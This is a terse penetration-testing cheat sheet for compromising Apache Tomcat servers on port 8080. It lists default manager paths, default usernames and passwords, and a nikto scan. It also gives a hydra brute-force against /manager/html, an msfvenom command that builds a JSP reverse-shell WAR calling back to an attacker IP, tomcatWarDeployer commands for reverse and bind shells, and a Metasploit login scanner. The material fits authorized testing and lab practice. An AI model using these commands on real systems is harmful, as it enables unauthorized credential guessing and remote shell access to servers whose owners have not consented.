Tomcat 8080

#Default port 8080 Check out default directories /manager /manager.html #Default creds list https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown

#Run nikto nikto -h http://10.10.10.10:8080 #Reverse shell to upload sudo msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.101.112 LPORT=1234 -f war -o shelly.war #Hydra hydra -L users.txt -P /usr/share/seclists/Passwords/darkweb2017-top1000.txt -f 10.10.10.10 http-get /manager/html #tomcatWarDeployer.py sudo git-clone https://github.com/mgeeky/tomcatWarDeployer.git Revshell:

./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/ Bind shell:

./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/

#Users.txt

admin
both 
manager 
role1 
role 
root 
tomcat

#Default_passwords.txt

manager
role1
password
password1
r00t
root
toor
tomcat
s3cret
password1
password
admin
changethis

#Metasploit Scanner | good for quick username enumeration/bruteforcing

 use auxiliary/scanner/http/tomcat_mgr_login

Last updated